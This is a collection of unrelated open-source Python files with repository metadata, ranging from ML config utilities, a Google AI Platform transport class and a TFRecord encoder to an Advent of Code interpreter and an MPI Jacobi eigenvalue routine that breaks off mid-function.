a30be694eca63a88eff2b727822bab6367cf71fe
|
d0dfd680e92e9b32f24e6e034571ad4323a58103
|
/src/yeahml/information/write_info.py
|
e25421e67c2746d55a8337851f10397129d59851
|
[
"Apache-2.0"
] |
permissive
|
yeahml/yeahml
|
6d1523d01300532f19c54d8e9c320420df66ee5c
|
b51faff6625db5980151a4a5fac7bb49313df5c1
|
refs/heads/master
| 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 |
Apache-2.0
| 2023-06-02T18:45:48 | 2018-06-16T22:11:19 |
Python
|
UTF-8
|
Python
| false | false | 1,138 |
py
|
import json
import pathlib
from typing import Any, Dict
def write_build_information(
model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
full_exp_path = (
pathlib.Path(meta_cdict["yeahml_dir"])
.joinpath(meta_cdict["data_name"])
.joinpath(meta_cdict["experiment_name"])
)
json_path = pathlib.Path(full_exp_path).joinpath("info.json")
data_to_write = {}
KEYS_TO_WRITE = ["model_hash"]
if pathlib.Path(json_path).exists():
with open(json_path) as json_file:
data = json.load(json_file)
for k in KEYS_TO_WRITE:
if not k == "model_hash" and not meta_cdict["name_overwrite"]:
assert (
data[k] == model_cdict[k]
), f"info at {json_path} already contains the same values for keys {k}, but {json_path}={data[k]} and model config = {model_cdict[k]}\n > possible solution: change the name of the current model?"
for k in KEYS_TO_WRITE:
data_to_write[k] = model_cdict[k]
with open(json_path, "w") as outfile:
json.dump(data_to_write, outfile)
return True
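# Usage sketch (hypothetical config dicts; assumes the experiment directory
# yeahml/mnist/trial_00 already exists):
#   write_build_information(
#       {"model_hash": "abc123"},
#       {"yeahml_dir": "yeahml", "data_name": "mnist",
#        "experiment_name": "trial_00", "name_overwrite": False},
#   )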
|
[
"[email protected]"
] | |
f60472dc9f2c47ee9077d7de07554b3dae6f0215
|
5c72f7709e501bd0ca3c5dc1e1f21cfffda13582
|
/rebench/model/measurement.py
|
40af4d69df6564115af83afce35a6769e7585c55
|
[] |
no_license
|
lhoste-bell/ReBench
|
74ccb400aa5f262b56659afac3b7db873bd6a8d2
|
0f5c678b045b5208e9a2bed01629c780bef52da5
|
refs/heads/master
| 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null |
UTF-8
|
Python
| false | false | 2,563 |
py
|
# Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
def __init__(self, value, unit, run_id, criterion = 'total',
timestamp = None):
self._run_id = run_id
self._criterion = criterion
self._value = value
self._unit = unit
self._timestamp = timestamp or datetime.now()
def is_total(self):
return self._criterion == 'total'
@property
def criterion(self):
return self._criterion
@property
def value(self):
return self._value
@property
def unit(self):
return self._unit
@property
def timestamp(self):
return self._timestamp
@property
def run_id(self):
return self._run_id
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"
def as_str_list(self):
return ["[" + self._timestamp.strftime(self.TIME_FORMAT) + "]",
"%f" % self._value,
self._unit,
self._criterion] + self._run_id.as_str_list()
@classmethod
def from_str_list(cls, data_store, str_list):
timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
value = float(str_list[1])
unit = str_list[2]
criterion = str_list[3]
run_id = RunId.from_str_list(data_store, str_list[4:])
return Measurement(value, unit, run_id, criterion, timestamp)
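# Round-trip sketch (run_id and data_store are hypothetical stand-ins):
#   m = Measurement(42.0, 'ms', run_id)
#   Measurement.from_str_list(data_store, m.as_str_list()).value == 42.0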
|
[
"[email protected]"
] | |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07
|
f5f40cee05de885ee059bcf4760e16f3f01ed23c
|
/ims/exceptions.py
|
c359b0a8626603fd8084e35af12b1dcce84a8c5e
|
[] |
no_license
|
MarsWizard/imagebank
|
68693207d71024bd0cdc608984d80fc0c7b6f751
|
916a9f087194052e77751fd8d52c930e77a7b04d
|
refs/heads/master
| 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 452 |
py
|
ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002
INVALID_IMAGE_FILE = 10003
class ImsException(BaseException):
def __init__(self, error_code, error_msg):
self.error_code = error_code
self.error_msg = error_msg
class InvalidImageFile(ImsException):
def __init__(self):
super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
'Invalid Image File')
|
[
"[email protected]"
] | |
477f89560ab67fce9dddcc436863915129dc25bd
|
707bd0e873ae25146f1341b40d8efbf5134025af
|
/unifypage/migrations/0004_auto_20161021_0933.py
|
781e95f7baa886a438135233d4469070f9415423
|
[] |
no_license
|
yosmangel/djangoLn2x
|
76acd748adfddb5b21ad3e0342e3d7eb19b81bc9
|
24d068458e8271aacfa98d762c0dc117e65d41cf
|
refs/heads/master
| 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 600 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('unifypage', '0003_auto_20161020_1746'),
]
operations = [
migrations.RemoveField(
model_name='row',
name='background_url',
),
migrations.AddField(
model_name='row',
name='background',
field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
),
]
|
[
"[email protected]"
] | |
f2b7180d176b4eec46c3794ea9526f5ec48beb91
|
228ebc9fb20f25dd3ed2a6959aac41fd31314e64
|
/google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py
|
3405e5f21603a2bae9a6b0b1b8a675b832545a71
|
[
"Apache-2.0"
] |
permissive
|
orionnye/python-aiplatform
|
746e3df0c75025582af38223829faeb2656dc653
|
e3ea683bf754832340853a15bdb0a0662500a70f
|
refs/heads/main
| 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 |
Apache-2.0
| 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null |
UTF-8
|
Python
| false | false | 7,763 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
"""Abstract transport class for MigrationService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "aiplatform.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.search_migratable_resources: gapic_v1.method.wrap_method(
self.search_migratable_resources,
default_timeout=None,
client_info=client_info,
),
self.batch_migrate_resources: gapic_v1.method.wrap_method(
self.batch_migrate_resources,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def search_migratable_resources(
self,
) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Union[
migration_service.SearchMigratableResourcesResponse,
Awaitable[migration_service.SearchMigratableResourcesResponse],
],
]:
raise NotImplementedError()
@property
def batch_migrate_resources(
self,
) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
|
[
"[email protected]"
] | |
2f320639bf0c7b231d588ce8050002ed8d7f888e
|
eb52ecd946dc6c2e4d7bd63a27bbfbc587ccbe79
|
/doc/source/conf.py
|
7da23a679516396f631dd434f1640595a4a9aab4
|
[
"Apache-2.0"
] |
permissive
|
dtroyer/osc-choochoo
|
5ee7b124b7c53c44aac5651dde950e11778e1653
|
57119ab84528933da9cbcd57dcd4f5b842a58186
|
refs/heads/master
| 2021-09-08T00:06:58.580823 | 2018-03-03T19:20:07 | 2018-03-03T19:36:37 | 103,709,841 | 1 | 1 |
Apache-2.0
| 2018-03-03T13:28:05 | 2017-09-15T23:34:08 |
Python
|
UTF-8
|
Python
| false | false | 2,903 |
py
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import pbr.version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
'stevedore.sphinxext',
'cliff.sphinxext',
]
# openstackdocstheme options
repository_name = 'dtroyer/osc-choochoo'
bug_project = ''
bug_tag = ''
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'osc-choochoo'
copyright = u'2017 Dean Troyer'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
[
"[email protected]"
] | |
eeca7667162158e4c128fc7a5beedc8e432f8d53
|
4882e66d296cb0e5dab21de1170e13f8c54a6c9c
|
/Exercicios/2-ex7.py
|
0e2b488de4c6e268228bb55c516ec4f10b0faca2
|
[] |
no_license
|
felipemanfrin/NLP
|
d6eac822fc919f93a1146c004540f62fe9c83086
|
45424ca49504d5f11e13f8d97829a0d5a9926bc2
|
refs/heads/master
| 2023-01-21T12:16:56.081979 | 2020-12-02T21:20:30 | 2020-12-02T21:20:30 | 268,633,901 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 581 |
py
|
import spacy
from spacy.matcher import Matcher
from spacy.matcher import PhraseMatcher
nlp = spacy.load('en_core_web_sm')
matcher = PhraseMatcher(nlp.vocab)
pattern = ['swimming vigorously']
phrase_patterns = [nlp(text) for text in pattern]
matcher.add('SwimmingVigorously', None, *phrase_patterns)
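# (Note: this is the spaCy v2 matcher API; in v3 the patterns are passed as a
#  list, e.g. matcher.add('SwimmingVigorously', phrase_patterns).)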
with open('../UPDATED_NLP_COURSE/TextFiles/owlcreek.txt') as f:
doc = nlp(f.read())
found_matches = matcher(doc)
for match_id, start, end in found_matches:
    string_id = nlp.vocab.strings[match_id]  # resolve the match id to its string label
    span = doc[max(start - 10, 0):end + 10]  # widen the window to include surrounding context
print(match_id, string_id, start, end, span.text)
|
[
"[email protected]"
] | |
57af349162a6ec2e90c73196d07d293ccd657ef7
|
e97c5e5beb22444b7eabd743a35493ab6fd4cb2f
|
/nbs/15_gsa_gls/20-null_simulations/20_gls_phenoplier/profiling/py/01_03-gls-profiling-new_code.py
|
419a1aae91420228e40cf2683fc7fa6979628e86
|
[
"BSD-2-Clause-Patent"
] |
permissive
|
greenelab/phenoplier
|
bea7f62949a00564e41f73b361f20a08e2e77903
|
b0e753415e098e93a1f206bb90b103a97456a96f
|
refs/heads/main
| 2023-08-23T20:57:49.525441 | 2023-06-15T06:00:32 | 2023-06-22T16:12:37 | 273,271,013 | 5 | 2 |
NOASSERTION
| 2023-06-20T20:35:45 | 2020-06-18T15:13:58 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,943 |
py
|
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# formats: ipynb,py//py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.8
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# It profiles some functions to compute the correlation between predicted gene expression. Each of these notebooks is supposed to be run in a particular changeset.
#
# **Before running this notebook**, make sure you are in this changeset:
# ```bash
# # the changes tried to improve the performance by activating lru_cache for method Gene._get_ssm_correlation
# git co fd3d476f0f4e53b8b8dfbe395dcf498c09b03aaf
# ```
# %%
# %load_ext line_profiler
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
from entity import Gene
# %% [markdown]
# # Functions
# %%
def compute_ssm_correlation(all_genes):
res = []
for g1_idx, g1 in enumerate(all_genes[:-1]):
for g2 in all_genes[g1_idx:]:
c = g1.get_ssm_correlation(
g2,
reference_panel="1000G",
model_type="MASHR",
use_within_distance=False,
)
res.append(c)
return res
# %% [markdown]
# # Test case
# %%
gene1 = Gene(ensembl_id="ENSG00000180596")
gene2 = Gene(ensembl_id="ENSG00000180573")
gene3 = Gene(ensembl_id="ENSG00000274641")
gene4 = Gene(ensembl_id="ENSG00000277224")
all_genes = [gene1, gene2, gene3, gene4]
# %%
assert len(set([g.chromosome for g in all_genes])) == 1
# %% [markdown]
# # Run timeit
# %%
# %timeit compute_ssm_correlation(all_genes)
# %% [markdown]
# # Profile
# %%
# %prun -l 20 -s cumulative compute_ssm_correlation(all_genes)
# %%
# %prun -l 20 -s time compute_ssm_correlation(all_genes)
# %%
|
[
"[email protected]"
] | |
09b56da17b552a715728664e0d4b355d51787a27
|
179140ef3ac111af7645636b5408894a3b61094f
|
/camera_trap_classifier/data/tfr_encoder_decoder.py
|
2cf32feeda4cd2d78f8897e135b88d0269e7e2f9
|
[
"MIT"
] |
permissive
|
YunyiShen/camera-trap-classifier
|
1d9bc3431ed31a00edfcd8fa4323fcf110ecc514
|
95f5f2db1c61f401e2408b8a9bfb6c069fa1a98e
|
refs/heads/master
| 2020-12-04T06:42:24.552725 | 2020-01-03T23:01:44 | 2020-01-03T23:01:44 | 231,662,686 | 0 | 0 |
MIT
| 2020-01-03T20:47:03 | 2020-01-03T20:47:02 | null |
UTF-8
|
Python
| false | false | 7,590 |
py
|
""" Class To Encode and Decode TFRecords"""
import logging
import tensorflow as tf
from camera_trap_classifier.data.utils import (
wrap_int64, wrap_bytes, wrap_dict_bytes_list, wrap_dict_int64_list,
_bytes_feature_list,
_bytes_feature_list_str)
from camera_trap_classifier.data.image import decode_image_bytes_1D
logger = logging.getLogger(__name__)
class TFRecordEncoderDecoder(object):
""" Define Encoder and Decoder for a specific TFRecord file """
def __init__(self):
logger.info("Initializing TFRecordEncoderDecoder")
def encode_record(self, record_data):
raise NotImplementedError
def decode_record(self):
raise NotImplementedError
class DefaultTFRecordEncoderDecoder(TFRecordEncoderDecoder):
""" Default TFREncoder / Decoder """
def _convert_to_tfr_data_format(self, record):
""" Convert a record to a tfr format """
id = record['id']
n_images = record['n_images']
n_labels = record['n_labels']
image_paths = record['image_paths']
meta_data = record['meta_data']
label_text = record['labelstext']
labels = {k: v for k, v in record.items() if 'label/' in k}
labels_num = {k: v for k, v in record.items() if 'label_num/' in k}
label_features = wrap_dict_bytes_list(labels)
label_num_features = wrap_dict_int64_list(labels_num)
tfr_data = {
"id": wrap_bytes(tf.compat.as_bytes(id)),
"n_images": wrap_int64(n_images),
"n_labels": wrap_int64(n_labels),
"image_paths": _bytes_feature_list_str(image_paths),
"meta_data": wrap_bytes(tf.compat.as_bytes(meta_data)),
"labelstext": wrap_bytes(tf.compat.as_bytes(label_text)),
"images": _bytes_feature_list(record['images']),
**label_features,
**label_num_features
}
return tfr_data
def encode_record(self, record_data):
""" Encode Record to Serialized String """
tfr_data_dict = self._convert_to_tfr_data_format(record_data)
feature_attributes = set(['id', 'n_images', 'n_labels',
'meta_data', 'labelstext'])
feature_list_attributes = tfr_data_dict.keys() - feature_attributes
# Wrap the data as TensorFlow Features
feature_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_attributes}
feature = tf.train.Features(feature=feature_dict)
# Wrap lists as FeatureLists
feature_list_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_list_attributes}
feature_lists = tf.train.FeatureLists(feature_list=feature_list_dict)
# Wrap again as a TensorFlow Example.
example = tf.train.SequenceExample(
context=feature,
feature_lists=feature_lists)
# Serialize the data.
serialized = example.SerializeToString()
return serialized
def decode_record(self, serialized_example,
output_labels,
label_lookup_dict=None,
image_pre_processing_fun=None,
image_pre_processing_args=None,
image_choice_for_sets='random',
decode_images=True,
numeric_labels=False,
return_only_ml_data=True,
only_return_one_label=True
):
""" Decode TFRecord and return dictionary """
# fixed size Features - ID and labels
if return_only_ml_data:
context_features = {
'id': tf.FixedLenFeature([], tf.string)
}
else:
context_features = {
'id': tf.FixedLenFeature([], tf.string),
'n_images': tf.FixedLenFeature([], tf.int64),
'n_labels': tf.FixedLenFeature([], tf.int64),
'meta_data': tf.FixedLenFeature([], tf.string),
'labelstext': tf.FixedLenFeature([], tf.string)
}
# Extract labels (string and numeric)
label_names = ['label/' + l for l in output_labels]
label_features = {k: tf.FixedLenSequenceFeature([], tf.string)
for k in label_names}
label_num_names = ['label_num/' + l for l in output_labels]
label_num_features = {k: tf.FixedLenSequenceFeature([], tf.int64)
for k in label_num_names}
if return_only_ml_data:
if numeric_labels:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_num_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
'image_paths': tf.FixedLenSequenceFeature([], tf.string),
**label_features,
**label_num_features
}
# Parse the serialized data so we get a dict with our data.
context, sequence = tf.parse_single_sequence_example(
serialized=serialized_example,
context_features=context_features,
sequence_features=sequence_features)
# determine label prefix for either numeric or string labels
if numeric_labels:
label_prefix = 'label_num/'
else:
label_prefix = 'label/'
        # Whether to return only the labels of the first observation or all,
        # and whether to map string labels to integers using a lookup table
if only_return_one_label:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: tf.reshape(label_lookup_dict[k].lookup(v[0]), [1])
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v[0]
for k, v in sequence.items() if label_prefix in k}
else:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: label_lookup_dict[k].lookup(v)
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v
for k, v in sequence.items() if label_prefix in k}
if not decode_images:
return {**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k},
**parsed_labels}
# decode 1-D tensor of raw images
image = decode_image_bytes_1D(
sequence['images'],
**image_pre_processing_args)
# Pre-Process image
if image_pre_processing_fun is not None:
image_pre_processing_args['image'] = image
image = image_pre_processing_fun(**image_pre_processing_args)
return ({'images': image},
{**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k and 'images' not in k},
**parsed_labels})
|
[
"[email protected]"
] | |
93ee6822569c5b7e9169ffac1e02ef95e6d5c928
|
412b0612cf13e9e28b9ea2e625975f3d9a2f52b6
|
/2017/18/double_computer.py
|
15e82c468b7a8a9ed25058bcadfb08c381a40aa1
|
[] |
no_license
|
AlexClowes/advent_of_code
|
2cf6c54a5f58db8482d1692a7753b96cd84b6279
|
d2158e3a4edae89071e6a88c9e874a9a71d4d0ec
|
refs/heads/master
| 2022-12-24T19:02:07.815437 | 2022-12-23T17:35:53 | 2022-12-23T17:35:53 | 225,618,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,700 |
py
|
from collections import defaultdict
import operator
from queue import Queue
def prog(program, program_id, snd_queue, rcv_queue):
registers = defaultdict(int)
registers["p"] = program_id
value = lambda x: registers[x] if x.isalpha() else int(x)
instruction_pointer = 0
while 0 <= instruction_pointer < len(program):
op, *args = program[instruction_pointer].split()
if op == "set":
registers[args[0]] = value(args[1])
elif op in ("add", "mul", "mod"):
func = getattr(operator, op)
registers[args[0]] = func(registers[args[0]], value(args[1]))
elif op == "jgz":
if value(args[0]) > 0:
instruction_pointer += value(args[1]) - 1
elif op == "snd":
snd_queue.put(value(args[0]))
yield True
elif op == "rcv":
if rcv_queue.empty():
instruction_pointer -= 1
yield False
else:
registers[args[0]] = rcv_queue.get()
instruction_pointer += 1
def count_sends_before_blocking(prog):
ret = 0
while next(prog):
ret += 1
return ret
def run(program):
q0, q1 = Queue(), Queue()
prog0 = prog(program, 0, q0, q1)
prog1 = prog(program, 1, q1, q0)
total = 0
while True:
prog0_sends = count_sends_before_blocking(prog0)
prog1_sends = count_sends_before_blocking(prog1)
total += prog1_sends
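        # A full pass in which neither program sends anything means both are
        # blocked on empty receive queues (deadlock), so the tally is final.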
if prog0_sends == prog1_sends == 0:
return total
def main():
with open("program.txt") as f:
program = [line.strip() for line in f]
print(run(program))
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
08f3bcef3f8cd09135340a9e0b5b59eba23f21d6
|
a6cba5b8b36f3f4ef80d7351725da0bc8ddbfad4
|
/NM/cp/main.py
|
e362e92e7130e9ddfb28811f5a86ec2d6613187c
|
[] |
no_license
|
tutkarma/mai_study
|
7de61a406c7c5701ea9bbea7da687cc147653e53
|
39359eb8b5701c752d1f4e8e0b26911e50df12ab
|
refs/heads/master
| 2023-03-15T18:28:05.814809 | 2022-01-18T08:40:39 | 2022-01-18T08:40:39 | 103,191,526 | 38 | 99 | null | 2023-03-04T02:20:21 | 2017-09-11T21:46:56 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 5,366 |
py
|
import argparse
import json
from utils import save_to_file
from mpi4py import MPI
import numpy as np
def read_data(filename, need_args):
init_dict = {}
with open(filename, 'r') as json_data:
data = json.load(json_data)[0] # !
for arg in need_args:
if arg not in data:
raise ValueError('No "{0}" in given data'.format(arg))
if arg == 'matrix':
init_dict[arg] = np.array(data[arg], dtype=np.float64)
else:
init_dict[arg] = data[arg]
return init_dict
def sign(n):
return 1 if n > 0 else -1
def t(A):
return np.sqrt(sum([A[i, j] ** 2 for i in range(A.shape[0])
for j in range(i + 1, A.shape[0])]))
def indexes_max_elem(A):
    i_max, j_max = 0, 1
    a_max = 0.0  # seed with zero so only off-diagonal magnitudes are compared
for i in range(A.shape[0]):
for j in range(i + 1, A.shape[0]):
if abs(A[i, j]) > a_max:
a_max = abs(A[i, j])
i_max, j_max = i, j
return i_max, j_max
def parallel_jacobi_rotate(comm, A, ind_j, ind_k):
sz = A.shape[0]
rank = comm.Get_rank()
pool_size = comm.Get_size()
c = s = 0.0
j = k = 0
row_j, row_k = np.zeros(sz), np.zeros(sz)
if rank == 0:
j, k = ind_j, ind_k
if A[j, j] == A[k, k]:
c = np.cos(np.pi / 4)
s = np.sin(np.pi / 4)
else:
tau = (A[j, j] - A[k, k]) / (2 * A[j, k])
t = sign(tau) / (abs(tau) + np.sqrt(1 + tau ** 2))
c = 1 / np.sqrt(1 + t ** 2)
s = c * t
for i in range(sz):
row_j[i] = A[j, i]
row_k[i] = A[k, i]
j = comm.bcast(j, root=0)
k = comm.bcast(k, root=0)
c = comm.bcast(c, root=0)
s = comm.bcast(s, root=0)
comm.Bcast(row_j, root=0)
comm.Bcast(row_k, root=0)
row_j_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 1]))
row_k_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 0]))
row_j_rank = row_j_size = -1
row_j_new = np.zeros(sz)
if MPI.COMM_NULL != row_j_comm:
row_j_rank = row_j_comm.Get_rank()
row_j_size = row_j_comm.Get_size()
size = int(sz / row_j_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_j_new_part = np.zeros(size)
